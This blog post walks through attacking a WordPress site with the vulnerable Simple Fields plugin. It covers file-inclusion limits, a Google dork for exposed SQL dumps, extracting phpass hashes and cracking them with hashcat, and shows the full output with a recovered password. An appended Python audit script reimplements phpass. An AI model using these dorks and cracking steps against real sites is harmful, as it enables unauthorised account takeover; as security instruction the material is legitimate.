The Reality of Log Contamination

by Vince
in Blog

I came across a web site running a current version of WordPress with the Simple Fields plugin installed.  Searching Exploit-DB, I found:

WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution

"This can even lead to remote code execution, for example by injecting php code into the apache logs or if allow_url_include is turned on in php.ini."

I've seen a lot of mistakes, but I haven't seen a change to the default permissions for access.log, which is what you'd need for command injection off of log contamination. You can absolutely inject into the logs; the entry will be there, you just won't have the rights to read it with Local File Inclusion. You can search for other logs, looking for something world readable:

find / -name '*.log' -perm -o=r -print 2>/dev/null   # quote the glob so the shell doesn't expand it; -perm -o=r matches any world-readable mode, not only 644; tests must precede -print

I doubt you’ll find anything that you can contaminate correctly and read.  I could be wrong.  I did find incorrect file permissions on the wp-content folder and I even had access to the log files:

/wp-content/debug.log

Unfortunately, it doesn't capture what we would want: you can read it, but it's useless for command execution.

Moving on to Remote File Inclusion, if you look at the defaults for php.ini:

http://php.net/manual/en/ini.list.php

"allow_url_include" is disabled by default. Again, not something I've seen someone accidentally enable.

Unless someone made a mistake, all you will get is LFI. So what mistakes can we exploit?

I've seen administrators and web developers set incorrect permissions on the www folder, which can allow you to peer into places and files that wouldn't be available to you under normal conditions. I've also seen web developers package up the .sql file into the root folder of the website when moving the site from development to production. On that latter point, the following Google Dork, generically searching for wordpress.sql, yields some interesting results:

intitle:"index of" "wordpress.sql" -contrib

With Local File Inclusion, I'd search for wordpress.sql, wp.sql, and the name of the site with a .sql extension; for example, if my site is myvulnerablewebsite.com, I'd search for myvulnerablewebsite.sql, hoping to score some hashes.

If you do find a .sql file, open it up and search for wp_users or user_pass; you should find some hashes that start with $P$. You can find a sample in the hashcat example hashes.

Once you have the hash, you can try cracking it with:

hashcat64.exe -m 400 hash_file.txt mypasswordlist.txt

Your hashcat executable name may vary, but the rest of the syntax stays the same for cracking a WordPress hash (mode 400 is phpass, the format WordPress stores in user_pass). Again, if we're talking about mistakes, weak WordPress passwords are promising. With a large list and a fast video card, I had this password cracked in one minute:

C:\hashcat>hashcat64.exe -m 400 wp_hash.txt final.txt
hashcat (v3.6.0) starting...

* Device #2: Not a native Intel OpenCL runtime. Expect massive speed loss.
             You can use --force to override, but do not report related errors.
OpenCL Platform #1: Advanced Micro Devices, Inc.
================================================
* Device #1: Hawaii, 4048/8192 MB allocatable, 44MCU
* Device #2: Intel(R) Xeon(R) CPU E5-1620 0 @ 3.60GHz, skipped.

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD

Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 75c

Dictionary cache hit:
* Filename..: final.txt
* Passwords.: 29925265
* Bytes.....: 311484373
* Keyspace..: 29925265
 

$P$BTo586nZRerHi2l77xuFFKwuf3Qq7t/:Elenita4212                          <<<-------------- SCORE!!!

Session..........: hashcat
Status...........: Cracked
Hash.Type........: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5)
Hash.Target......: $P$BTo586nZRerHi2l77xuFFKwuf3Qq7t/
Time.Started.....: Tue Jul 03 11:15:07 2018 (57 secs)
Time.Estimated...: Tue Jul 03 11:16:04 2018 (0 secs)
Guess.Base.......: File (final.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:   218.6 kH/s (11.66ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 12255524/29925265 (40.95%)
Rejected.........: 292/12255524 (0.00%)
Restore.Point....: 11534613/29925265 (38.54%)
Candidates.#1....: e8cxkqyripfy -> extramints
HWMon.Dev.#1.....: Fan:  0% Util:  0% Core: 300MHz Mem: 150MHz Bus:16

Started: Tue Jul 03 11:15:05 2018
Stopped: Tue Jul 03 11:16:05 2018
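
What mode 400 is actually computing, as an added Python example that is not part of the post: it reimplements the phpass $P$ scheme WordPress stores in user_pass, pulls the hashes out of a constructed wp_users INSERT (the hash the post recovered in row 1, md5("password") in row 2 to stand in for the pre-2.5 unsalted format), and audits them against a short constructed weak-password list. The function names, the dump rows and the weak list are my own; the only value taken from the post is the cracked hash.

```python
import hashlib
import re

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def _encode64(data: bytes) -> str:
    """phpass's own base64 variant (not RFC 4648): little-endian 3-byte groups, 16 bytes -> 22 chars."""
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        value = int.from_bytes(chunk, "little")
        for _ in range(len(chunk) + 1):
            out.append(ITOA64[value & 0x3F])
            value >>= 6
    return "".join(out)

def phpass_hash(password: str, setting: str) -> str:
    """Recompute a $P$ hash from its 12-char setting: '$P$', cost char, 8-char salt."""
    count = 1 << ITOA64.index(setting[3])  # WordPress default cost 'B' = 2**13 = 8192 rounds
    salt, pw = setting[4:12].encode(), password.encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(count):  # the iterated MD5 is what makes -m 400 a slow hash
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest)

def extract_hashes(sql_dump: str) -> dict:
    """Map user_login -> user_pass from wp_users INSERT rows (columns: ID, user_login, user_pass, ...)."""
    return dict(re.findall(r"\(\d+,\s*'([^']+)',\s*'([^']+)'", sql_dump))

def audit(sql_dump: str, weak_passwords: list) -> dict:
    """Per user: the weak password that matches, 'legacy unsalted MD5', 'unrecognised format', or None."""
    findings = {}
    for user, stored in extract_hashes(sql_dump).items():
        if re.fullmatch(r"[0-9a-f]{32}", stored):
            findings[user] = "legacy unsalted MD5"  # WordPress before 2.5 stored plain md5(password)
        elif not stored.startswith(("$P$", "$H$")) or len(stored) != 34:
            findings[user] = "unrecognised format"
        else:
            findings[user] = next((p for p in weak_passwords if phpass_hash(p, stored) == stored), None)
    return findings

# Constructed dump: row 1 carries the hash the post cracked; row 2's value is md5("password").
DUMP = """INSERT INTO `wp_users` VALUES (1,'admin','$P$BTo586nZRerHi2l77xuFFKwuf3Qq7t/','admin','a@example.com');
INSERT INTO `wp_users` VALUES (2,'editor','5f4dcc3b5aa765d61d8327deb882cf99','editor','e@example.com');"""

if __name__ == "__main__":
    for user, finding in audit(DUMP, ["password", "123456", "Elenita4212"]).items():
        print(f"{user}: {finding or 'no weak-list match'}")
```

Any user flagged as legacy MD5 or matching the weak list is a forced-reset candidate; WordPress only rehashes a legacy MD5 value with phpass on that user's next successful login, so dormant accounts keep the weak format indefinitely.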


Happy hunting!